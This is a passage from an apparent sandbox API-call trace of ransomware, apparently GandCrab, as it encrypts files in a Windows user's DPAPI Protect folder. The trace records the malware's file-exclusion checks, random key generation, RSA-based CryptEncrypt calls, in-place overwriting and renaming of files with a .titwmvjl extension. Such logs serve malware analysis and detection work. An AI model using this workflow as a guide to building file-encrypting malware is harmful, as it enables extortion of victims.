(lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="boot.ini") returned 1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="ntuser.dat.log") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="thumbs.db") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="KRAB-DECRYPT.html") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="CRAB-DECRYPT.html") returned 1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="ntldr") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="NTDETECT.COM") returned -1 [0073.189] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="Bootfont.bin") returned 1 [0073.190] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a") returned 138 [0073.190] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.190] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0073.190] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0073.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.190] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.191] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.191] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.191] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.191] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0073.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.191] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.191] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.192] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.192] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.192] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.192] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.192] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0073.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.193] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.193] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.193] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.193] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503738) returned 1 [0073.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.194] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.194] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.194] GetLastError () returned 0x0 [0073.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.194] CryptDestroyKey (hKey=0x503738) returned 1 [0073.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.194] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.195] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.195] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503978) returned 1 [0073.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.195] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.195] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.196] GetLastError () returned 0x0 [0073.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.196] CryptDestroyKey (hKey=0x503978) returned 1 [0073.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.196] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.196] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.196] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.196] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x1d4, lpOverlapped=0x0) returned 1 [0073.206] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.207] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x1d4, lpOverlapped=0x0) returned 1 [0073.208] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.208] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0073.210] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.213] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.213] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.213] CloseHandle (hObject=0x2cc) returned 1 [0073.215] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a.titwmvjl"), dwFlags=0x1) returned 1 [0073.216] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.216] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.216] lstrcmpW (lpString1="Preferred", lpString2=".") returned 1 [0073.216] lstrcmpW (lpString1="Preferred", lpString2="..") returned 1 [0073.216] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="Preferred" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred" [0073.217] lstrlenW (lpString=".titwmvjl") returned 9 [0073.217] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred") returned 111 [0073.217] VirtualAlloc (lpAddress=0x0, dwSize=0x11e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.217] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred.titwmvjl") returned 120 [0073.217] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred") returned 111 [0073.217] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred") returned 111 [0073.217] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred") returned 111 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="desktop.ini") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="autorun.inf") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="ntuser.dat") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="iconcache.db") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="bootsect.bak") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="boot.ini") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="ntuser.dat.log") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="thumbs.db") returned -1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="KRAB-DECRYPT.html") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="CRAB-DECRYPT.html") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="ntldr") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="NTDETECT.COM") returned 1 [0073.217] lstrcmpiW (lpString1="Preferred", lpString2="Bootfont.bin") returned 1 [0073.217] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred") returned 111 [0073.217] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.217] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0073.218] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0073.218] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.218] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.218] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.218] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.219] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.219] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0073.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.219] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.219] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.219] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.219] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.220] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.220] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.220] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0073.220] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.220] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.220] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.220] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.220] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.221] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.221] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503278) returned 1 [0073.221] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.221] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.221] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.221] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.222] GetLastError () returned 0x0 [0073.222] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.222] CryptDestroyKey (hKey=0x503278) returned 1 [0073.222] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.222] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.222] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.222] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.222] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.223] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503578) returned 1 [0073.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.223] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.223] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.223] GetLastError () returned 0x0 [0073.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.223] CryptDestroyKey (hKey=0x503578) returned 1 [0073.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.224] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.224] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.224] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.224] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x18, lpOverlapped=0x0) returned 1 [0073.234] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.234] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x18, lpOverlapped=0x0) returned 1 [0073.235] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.235] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0073.237] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.241] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.241] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.241] CloseHandle (hObject=0x2cc) returned 1 [0073.242] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\preferred"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\Preferred.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\preferred.titwmvjl"), dwFlags=0x1) returned 1 [0073.243] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.243] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.243] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.243] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.243] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt" [0073.243] lstrlenW (lpString=".titwmvjl") returned 9 [0073.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 122 [0073.243] VirtualAlloc (lpAddress=0x0, dwSize=0x134, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.243] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 131 [0073.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 122 [0073.243] lstrlenW (lpString=".txt") returned 4 [0073.243] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.243] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.244] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.244] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 122 [0073.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 122 [0073.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.244] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.244] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0073.244] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0073.245] CloseHandle (hObject=0x2c4) returned 1 [0073.245] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.245] lstrcmpW (lpString1="SYNCHIST", lpString2=".") returned 1 [0073.245] lstrcmpW (lpString1="SYNCHIST", lpString2="..") returned 1 [0073.245] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="SYNCHIST" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" [0073.245] lstrlenW (lpString=".titwmvjl") returned 9 [0073.245] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 64 [0073.245] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.245] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.titwmvjl") returned 73 [0073.245] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 64 [0073.245] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 64 [0073.245] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 64 [0073.245] lstrcmpiW (lpString1="SYNCHIST", lpString2="desktop.ini") returned 1 [0073.245] lstrcmpiW (lpString1="SYNCHIST", lpString2="autorun.inf") returned 1 [0073.245] lstrcmpiW (lpString1="SYNCHIST", lpString2="ntuser.dat") returned 1 [0073.245] lstrcmpiW (lpString1="SYNCHIST", lpString2="iconcache.db") returned 1 [0073.245] lstrcmpiW (lpString1="SYNCHIST", lpString2="bootsect.bak") returned 1 [0073.245] lstrcmpiW (lpString1="SYNCHIST", lpString2="boot.ini") returned 1 [0073.245] lstrcmpiW (lpString1="SYNCHIST", lpString2="ntuser.dat.log") returned 1 [0073.245] lstrcmpiW (lpString1="SYNCHIST", lpString2="thumbs.db") returned -1 [0073.246] lstrcmpiW (lpString1="SYNCHIST", 